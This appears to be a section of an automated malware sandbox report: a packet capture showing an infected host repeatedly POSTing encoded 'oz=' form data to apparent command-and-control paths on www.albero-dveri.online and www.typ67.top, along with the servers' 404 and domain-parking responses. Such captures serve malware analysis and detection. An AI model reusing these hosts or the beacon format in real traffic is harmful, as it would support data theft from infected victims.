                                                                                                                                              Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:12:14.710009098 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                                                                              Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              79192.168.11.2049809194.58.112.17480
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:17.231177092 CEST848OUTPOST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                                                                              Oct 4, 2024 08:12:17.456372023 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                                                                              Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:12:17.456393957 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                                                                              Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                                                                              Oct 4, 2024 08:12:17.456415892 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                                                                              Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              80192.168.11.2049810194.58.112.17480
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:19.996772051 CEST1289OUTPOST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 31 50 49 4c 6d 53 64 79 5a 4c 39 78 55 75 4d 4f 79 5a 79 56 72 34 44 79 37 61 58 66 69 4d 38 42 53 37 54 79 54 42 57 49 4c 66 6b 2f 7a 63 4f 42 30 50 4b 35 2f 4e 7a 42 34 57 74 55 55 74 2f 4a 69 55 2b 38 32 6c 74 61 62 55 47 66 54 6d 42 46 36 7a 39 6e 63 56 33 58 64 47 73 43 4d 59 39 4d 68 51 76 4d 54 32 79 34 69 73 33 47 4f 5a 4d 34 59 59 68 36 4f 77 4a 6f 76 37 31 6e 31 4d 4e 6d 79 6d 63 41 75 6a 43 6e 41 41 79 49 4b 77 4b 46 6c 49 42 77 2f 43 68 69 48 58 2b 6b 54 50 79 32 6f 37 68 51 50 38 77 33 77 55 62 66 4c 70 4b 48 79 7a 34 52 55 6e 34 74 38 6f 2b 63 59 58 6c 36 36 58 6f 4b 34 79 34 44 69 74 64 55 2b 78 6d 63 49 34 59 4d 30 6c 4f 65 32 39 50 55 71 67 4a 78 51 58 6f 70 71 39 47 44 38 5a 65 4d 58 45 4d 62 77 7a 66 47 42 6e 31 6b 65 75 2f 76 4e 6f 35 76 69 54 57 50 54 75 5a 4f 6e 66 77 78 63 71 73 41 6f 6c 57 53 46 48 46 62 63 4e 44 31 7a 50 45 41 38 46 69 48 31 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a1PILmSdyZL9xUuMOyZyVr4Dy7aXfiM8BS7TyTBWILfk/zcOB0PK5/NzB4WtUUt/JiU+82ltabUGfTmBF6z9ncV3XdGsCMY9MhQvMT2y4is3GOZM4YYh6OwJov71n1MNmymcAujCnAAyIKwKFlIBw/ChiHX+kTPy2o7hQP8w3wUbfLpKHyz4RUn4t8o+cYXl66XoK4y4DitdU+xmcI4YM0lOe29PUqgJxQXopq9GD8ZeMXEMbwzfGBn1keu/vNo5viTWPTuZOnfwxcqsAolWSFHFbcND1zPEA8FiH19J5Z7HfAUTMhc1vFEWJ3MYkSj9JZYvyYFZxBd6OTHAlXO+ORDarI6LgKlZfv5mPgHqbhd3He2yn05UjLGvv02FPgcnsFBIBvBjB1y+dKgYI0SxM7qU1Bqg4gcI7tnvH7WZDWrB4lqVUWARZPaVlouA1yBPDFSNbi5crf+Z8+Y98wi6t5tDoyBtB4XJ/VUz+4Yjv3v3x4AbVea8mhzb2chqbBuSRTRVp6a2TG3Wqw+jMm4E6bK+lZQZDimljHuJ0sDh7T/Bn24sHLDR2QRuwt3gWsmfSz5seHRa4Kzb4F8Eibm4aEk0FmyTNqCrAHPc+Z4
                                                                                                                                              Oct 4, 2024 08:12:19.996820927 CEST5156OUTData Raw: 46 49 54 65 75 42 72 6a 62 4c 70 5a 6c 6d 69 7a 6a 54 39 6b 61 6a 66 76 7a 71 45 55 57 73 41 74 62 6e 71 4c 44 70 48 68 66 76 4e 58 31 77 4d 71 50 2b 7a 36 39 73 52 74 4e 61 64 70 54 37 50 72 55 4d 36 37 38 4e 7a 77 4d 64 6c 49 2f 76 52 4a 32 54
                                                                                                                                              Data Ascii: FITeuBrjbLpZlmizjT9kajfvzqEUWsAtbnqLDpHhfvNX1wMqP+z69sRtNadpT7PrUM678NzwMdlI/vRJ2Tnm+UZ08+X8bG2n8aFCOACOeoJk4D+iBSQ3tk2ZuABMgGCyWPWpn6iS4XUdigKlDyyvLoQUgU70ccuxUuML/i8Tas1w/ruEC3qwIILCvYM27Yy+1XynijvIOtPBGnAt5wvGdI+uLqzDi21yOAIfLw4m5xoOCgU8lZk
                                                                                                                                              Oct 4, 2024 08:12:20.227200031 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:20 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                                                                              Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:12:20.227231979 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                                                                              Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                                                                              Oct 4, 2024 08:12:20.227272034 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                                                                              Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41
                                                                                                                                              Oct 4, 2024 08:12:20.227339029 CEST1552OUTData Raw: 61 6c 43 68 4a 59 74 71 35 37 4f 68 34 74 35 41 75 62 72 2f 4f 47 42 38 61 49 46 67 2b 36 66 35 2f 59 75 63 36 34 4c 5a 64 42 64 6d 6a 5a 48 70 2f 36 71 46 4d 45 43 6d 61 57 4c 6b 54 4b 52 61 59 36 76 53 31 76 2b 44 37 47 32 5a 6d 71 4b 39 56 56
                                                                                                                                              Data Ascii: alChJYtq57Oh4t5Aubr/OGB8aIFg+6f5/Yuc64LZdBdmjZHp/6qFMECmaWLkTKRaY6vS1v+D7G2ZmqK9VVc+JFfm3l+T+pYYtxfS0xBTdO3P1+rlGDpa3V4K/q+TlQYPEr75OPw/DzyUm5zWfSwgvKQl7Y2xrvQdf6k9jLYhp+PruIkcjH0/IB8dezwYFT8UZBj/4luiI7b/84CpIEuSmMkfVTYwIN5NqkGZBkF/8cMD6nlhlZj


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              81192.168.11.2049811194.58.112.17480
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:22.754941940 CEST554OUTGET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:12:22.981142998 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:22 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                                                                                              Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:12:22.981209040 CEST1289INData Raw: 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                              Data Ascii: ent-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h1><p class="b-parking__header-description b-text">
                                                                                                                                              Oct 4, 2024 08:12:22.981224060 CEST1289INData Raw: 6f 6e 5f 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                              Data Ascii: on_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </
                                                                                                                                              Oct 4, 2024 08:12:22.981236935 CEST1289INData Raw: 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61
                                                                                                                                              Data Ascii: -item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-c
                                                                                                                                              Oct 4, 2024 08:12:22.981257915 CEST1289INData Raw: 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62
                                                                                                                                              Data Ascii: ize_large-compact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp;
                                                                                                                                              Oct 4, 2024 08:12:22.981309891 CEST1289INData Raw: 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76
                                                                                                                                              Data Ascii: g&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <
                                                                                                                                              Oct 4, 2024 08:12:22.981354952 CEST1289INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29
                                                                                                                                              Data Ascii: div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if (
                                                                                                                                              Oct 4, 2024 08:12:22.981374979 CEST1289INData Raw: 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f
                                                                                                                                              Data Ascii: All( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var d
                                                                                                                                              Oct 4, 2024 08:12:22.981386900 CEST485INData Raw: 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65
                                                                                                                                              Data Ascii: eElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true,


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              82192.168.11.204981238.47.207.14680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:28.294442892 CEST798OUTPOST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
